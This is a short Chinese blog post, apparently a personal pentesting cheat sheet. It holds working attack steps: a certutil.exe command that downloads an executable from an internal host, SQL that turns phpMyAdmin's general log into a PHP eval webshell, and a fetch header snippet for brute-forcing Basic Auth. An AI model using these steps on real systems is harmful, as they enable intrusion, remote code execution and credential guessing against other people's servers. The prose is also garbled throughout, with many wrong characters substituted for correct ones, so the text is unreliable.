寫在開始

比来弄網安滲透比較多,這裏列舉一下经常利用的一些号令,用于備忘

下載文件

在windows上下載文件用的号令

certutil.exe -urlcache -split -f http://172.16.1.28:2020/a.exe a.exe

一句話木馬

在phpMyAdmin中写一句話木馬的一种编制,是写在phpMyAdmin的日记里

show variables like '%general%';
SET GLOBAL general_log='on'
SET GLOBAL general_log_file='C:/phpStudy/www/cc.php'
SELECT '<?php eval($_POST["cmd"]);?>';

起首是將日记文件点窜爲放php文件的目錄,然後設置爲php後綴,然後寫個查詢,就會把這個查詢寫入日记了。

在浏览器里爆破Basic Auth

若是要触及到爆破Basic Auth,那么就需要在fetch的头里加一条,像下面如许。

headers.set('Authorization', 'Basic ' + btoa(username + ":" + password));

然後寫個批量發包的就好了。若是有需要,可能需要把btoa單一個函數換成下面這種組合

window.btoa(unescape(encodeURIComponent(string)))

不过,应当用不上,不需要专门url encode以后措置。

寫在最後

這個文┞仿也是持續更新狀態,若是後面看到了啥号令就會添進來,記錄一下這些零零散散的東西

Last modification:August 8, 2023
若是覺得我的文┞仿對你有效,請隨意贊賞